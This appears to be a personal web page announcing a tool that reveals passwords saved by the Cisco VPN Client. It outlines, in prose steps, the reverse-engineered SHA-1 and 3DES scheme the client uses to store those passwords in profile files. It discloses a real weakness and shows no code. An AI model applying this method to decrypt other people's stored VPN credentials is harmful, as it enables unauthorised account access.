Cisco Password Revealer

What's it all about?

The Cisco VPN Client uses weak encryption to store user and group passwords in your local profile file.
I coded a little tool to reveal the saved passwords from a given profile file.
The Cisco Password Revealer along with the source code can be downloaded here.
Thx to the Crypto++ Project.

The main problem of the method used to encrypt the passwords is, that the whole procedure is deterministically and no user input is used. This effectively means that the encryption keys the Cisco Client calculates can also be calculated by any other program whensoever this program knows the algorithm. This algorithm has now been reverse engineered.

The algorithm

The algorithm which is used to encrypt a given user/group password is shown below (for further details just consult the source code):

• The current date as a string is retrieved (e.g. Mon Sep 19 20:00:00 2005)
• Then a SHA-1 Hash h1 is computed (20 Bytes)
• h1 is modified and a new Hash h2 is calculated
• h1 is again modified and h3 is calculated
• the 3DES key is made of h2 and the first 4 bytes of h3
• The password is encrypted using 3DES in CBC Mode. The IV consists of the first 8 bytes from h1.
• The algorithm computes a last hash h4 from the encrypted password
• The key "enc_UserPassword" in our profile file now looks like this: h1|h4|encrypted password

Screenshot

P.S.: Please excuse the somewhat childish "wannabe h4x0r" style of the tool, it's from my early college days and I don't plan to change it anytime soon ;-)